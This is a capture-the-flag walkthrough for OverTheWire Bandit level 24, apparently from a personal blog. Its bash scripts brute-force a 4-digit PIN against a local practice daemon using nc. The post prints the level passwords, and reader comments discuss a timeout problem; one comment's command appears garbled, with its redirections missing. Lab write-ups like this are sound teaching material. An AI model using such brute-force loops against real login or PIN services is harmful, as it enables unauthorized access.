OverTheWire: Bandit Level 24 to Level 25

Level goal: A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

(screenshot: bandit24_2)

The following is my script to perform this brute-forcing technique:

#!/bin/bash

# Password for the current level (bandit24), sent with every trial
pass24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

pin=0

# Try every PIN from 0 to 9999 until the daemon answers something other than "Wrong!"
while [ $pin -lt 10000 ]; do
    echo "Attempting PIN: $pin"

    # Send "<password> <pin>" to the daemon and capture its reply
    attempt="$(echo $pass24 $pin | nc localhost 30002)"

    if ! [[ $attempt == *"Wrong!"* ]]; then
        # Any reply that is not "Wrong!" carries the bandit25 password
        echo -ne "$attempt"
        break
    fi

    ((pin++))
done

The script iterates through every possible PIN, stopping at the first one for which the daemon does not answer "Wrong!"; that reply reveals the secret pincode and the password for bandit25.

(screenshot: bandit24_1)

The password to gain access to the next level is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG.
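As an added example (not the post's own script), the same brute force done over a single connection: all 10000 trials are generated up front and piped through one nc session, so the daemon's wait for further input is paid once rather than once per PIN. The password, port and "Wrong!" reply text come from the post; zero-padding the PIN to four digits is an assumption about what the daemon accepts (the post's script sends it unpadded).

```shell
#!/bin/bash
# Added example, not the post's script: send all 10000 trials over ONE
# connection instead of one nc process per PIN, then filter the replies.
# Assumptions: password value, port and the "Wrong!" reply text are taken
# from the post; zero-padded 4-digit PINs are assumed to be accepted.

pass24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

# Print one "<password> <pin>" line per candidate, 0000 through 9999.
gen_trials() {
    pass="$1"
    pin=0
    while [ "$pin" -lt 10000 ]; do
        printf '%s %04d\n' "$pass" "$pin"
        pin=$((pin + 1))
    done
}

# Read the daemon's replies on stdin and keep only the lines that are
# neither "Wrong!" nor empty; what survives carries the bandit25 password.
find_hit() {
    grep -v -e 'Wrong!' -e '^$'
}

# Full run against the level's daemon (not executed at load time; call it
# from the bandit24 shell where localhost:30002 is reachable).
solve_level() {
    gen_trials "$pass24" | nc localhost 30002 | find_hit
}
```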


3 Comments

  • Richardn

    February 15, 2020

    This solution doesn’t work because the shell will be stuck at line:
    attempt=”$(echo $pass24 $pin | nc localhost 30002)”
    The daemon receives a single trial, outputs a “Wrong!” and waits for the next input, rendering the nc command not finished until a timeout after around 10secs
    So your shell takes 10secs for a single trial…

    For me, I echoed all the possible trials into a file called trials by a shell, then:
    nc localhost 30002 results
    uniq -u results

    • kongwenbin

      August 17, 2021

      Hi Richardn, my solution worked for me back then when I was doing it hands-on, not sure what happened now, I have seen a few other comments on something not working with their PuTTY session. Thanks for sharing your solution, I have approved it so others can see it too, I appreciate your sharing 🙂
